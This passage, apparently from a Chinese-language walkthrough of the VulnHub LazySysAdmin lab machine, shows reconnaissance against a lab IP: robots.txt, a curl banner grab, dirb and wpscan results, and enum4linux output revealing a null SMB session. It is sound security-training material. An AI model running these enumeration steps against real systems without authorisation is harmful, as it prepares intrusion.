輸出文件</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>在工具掃描的同時，手工探測漏洞利用點。訪問目標web服務,未發現什麼，查看是否存在robots.txt發現4個目錄，而且存在目錄遍歷漏洞，可是並沒用獲取到能夠利用的信息。</p><p><a href='http://192.168.0.100/robots.txt' target='_blank' class='url'>http://192.168.0.100/robots.txt</a></p><pre class="md-fences md-end-block" lang="http"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-error">User-agent: *</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /old/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /test/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /TR2/</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-atom">Disallow:</span><span class="cm-string"> /Backnode_files/</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 123px;"></div><div class="CodeMirror-gutters" style="display: none; height: 153px;"></div></div></div></pre><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/1.png' alt='1' referrerPolicy='no-referrer' /></p><p>使用curl獲取目標web的banner信息，發現使用的中間件是apache2.4.7，目標系統爲Ubuntu。</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  evilk0 <span class="cm-builtin">curl</span> <span class="cm-attribute">-I</span> <span class="cm-number">192</span>.168.0.100</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">HTTP/1.1 <span class="cm-number">200</span> OK</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Date: Wed, <span class="cm-number">31</span> Jan <span class="cm-number">2018</span> <span class="cm-number">13</span>:01:20 GMT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Server: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Last-Modified: Sun, <span class="cm-number">06</span> Aug <span class="cm-number">2017</span> <span class="cm-number">05</span>:02:15 GMT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">ETag: <span class="cm-string">"8ce8-5560ea23d23c0"</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Accept-Ranges: bytes</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Content-Length: <span class="cm-number">36072</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Vary: Accept-Encoding</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Content-Type: text/html</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 261px;"></div><div class="CodeMirror-gutters" style="display: none; height: 291px;"></div></div></div></pre><p>再來查看dirb掃描結果，發現目標文章用的是wordpress，且還有phpmyadmin。</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">➜  dirb222 <span class="cm-builtin">cat</span> /home/evilk0/Desktop/result.txt | <span class="cm-builtin">grep</span> <span class="cm-string">"^+"</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/index.html (CODE:200|SIZE:36072)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/info.php (CODE:200|SIZE:77257)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/robots.txt (CODE:200|SIZE:92)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/server-status (CODE:403|SIZE:293)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/favicon.ico (CODE:200|SIZE:18902)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/index.php (CODE:200|SIZE:8262)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/libraries (CODE:403|SIZE:300)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/phpinfo.php (CODE:200|SIZE:8264)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/phpmyadmin/setup (CODE:401|SIZE:459)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/index.php (CODE:301|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/javascript/jquery/jquery (CODE:200|SIZE:252879)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/javascript/jquery/version (CODE:200|SIZE:5)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-operator">+</span> http://192.168.0.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 560px;"></div><div class="CodeMirror-gutters" style="display: none; height: 590px;"></div></div></div></pre><p>wpscan掃描結果</p><pre class="md-fences md-end-block" lang="" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@kali:~# wpscan http://192.168.0.100/wordpress</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">_______________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">        __          _______   _____                  </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">        \ \        / /  __ \ / ____|                 </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">           \  /\  /  | |     ____) | (__| (_| | | | |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">            \/  \/   |_|    |_____/ \___|\__,_|_| |_|</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">        WordPress Security Scanner by the WPScan Team </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">                       Version 2.9.3</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">          Sponsored by Sucuri - https://sucuri.net</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">_______________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] URL: http://192.168.0.100/wordpress/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Started: Thu Feb  1 01:37:20 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] The WordPress 'http://192.168.0.100/wordpress/readme.html' file exists exposing a version number</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: LINK: <http://192.168.0.100/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Registration is enabled: http://192.168.0.100/wordpress/wp-login.php?action=register</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] XML-RPC Interface available under: http://192.168.0.100/wordpress/xmlrpc.php</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Upload directory has directory listing enabled: http://192.168.0.100/wordpress/wp-content/uploads/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] Includes directory has directory listing enabled: http://192.168.0.100/wordpress/wp-includes/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] WordPress version 4.8.5 (Released on 2018-01-16) identified from meta generator, links opml</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] WordPress theme in use: twentyfifteen - v1.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Name: twentyfifteen - v1.8</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Last updated: 2017-11-16T00:00:00.000Z</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Location: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Readme: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/readme.txt</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[!] The version is out of date, the latest version is 1.9</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Style URL: http://192.168.0.100/wordpress/wp-content/themes/twentyfifteen/style.css</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Theme Name: Twenty Fifteen</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Theme URI: https://wordpress.org/themes/twentyfifteen/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Author: the WordPress team</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> |  Author URI: https://wordpress.org/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Enumerating plugins from passive detection ...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] No plugins found</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Finished: Thu Feb  1 01:37:24 2018</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Requests Done: 356</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Memory used: 37.98 MB</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[+] Elapsed time: 00:00:04</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 1273px;"></div><div class="CodeMirror-gutters" style="display: none; height: 1303px;"></div></div></div></pre><p> </p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/6.png' alt='6' referrerPolicy='no-referrer' /></p><p>enum4linux 192.168.0.100</p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb  <span class="cm-number">1</span> <span class="cm-number">00</span>:46:08 <span class="cm-number">2018</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Target Information    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Target ........... <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">RID Range ........ <span class="cm-number">500</span><span class="cm-attribute">-550</span>,1000-1050</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Username ......... <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Password ......... <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Enumerating Workgroup/Domain on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got domain/workgroup name: WORKGROUP</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Nbtstat Information <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Looking up status of <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>LAZYSYSADMIN    <00> <span class="cm-attribute">-</span>         B <ACTIVE>  Workstation Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>LAZYSYSADMIN    <03> <span class="cm-attribute">-</span>         B <ACTIVE>  Messenger Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>LAZYSYSADMIN    <20> <span class="cm-attribute">-</span>         B <ACTIVE>  File Server Service</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>WORKGROUP       <00> <span class="cm-attribute">-</span> <GROUP> B <ACTIVE>  Domain/Workgroup Name</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>WORKGROUP       <1e> <span class="cm-attribute">-</span> <GROUP> B <ACTIVE>  Browser Service Elections</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>MAC Address <span class="cm-operator">=</span> <span class="cm-number">00</span><span class="cm-attribute">-00-00-00-00-00</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Session Check on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Server <span class="cm-number">192</span>.168.0.100 allows sessions using username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Getting domain SID <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Domain Name: WORKGROUP</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Domain Sid: (NULL SID)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Can<span class="cm-string">'t determine if host is part of domain or part of a workgroup</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    OS information on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got OS info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 from smbclient: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got OS info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 from srvinfo:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>LAZYSYSADMIN   Wk Sv PrQ Unx NT SNT Web server</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>platform_id     :<span class="cm-tab" role="presentation" cm-text="  ">   </span><span class="cm-number">500</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>os version      :<span class="cm-tab" role="presentation" cm-text="  ">   </span><span class="cm-number">6</span>.1</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>server type     :<span class="cm-tab" role="presentation" cm-text="  ">   </span>0x809a03</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Users on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================</span> </span></pre><pre 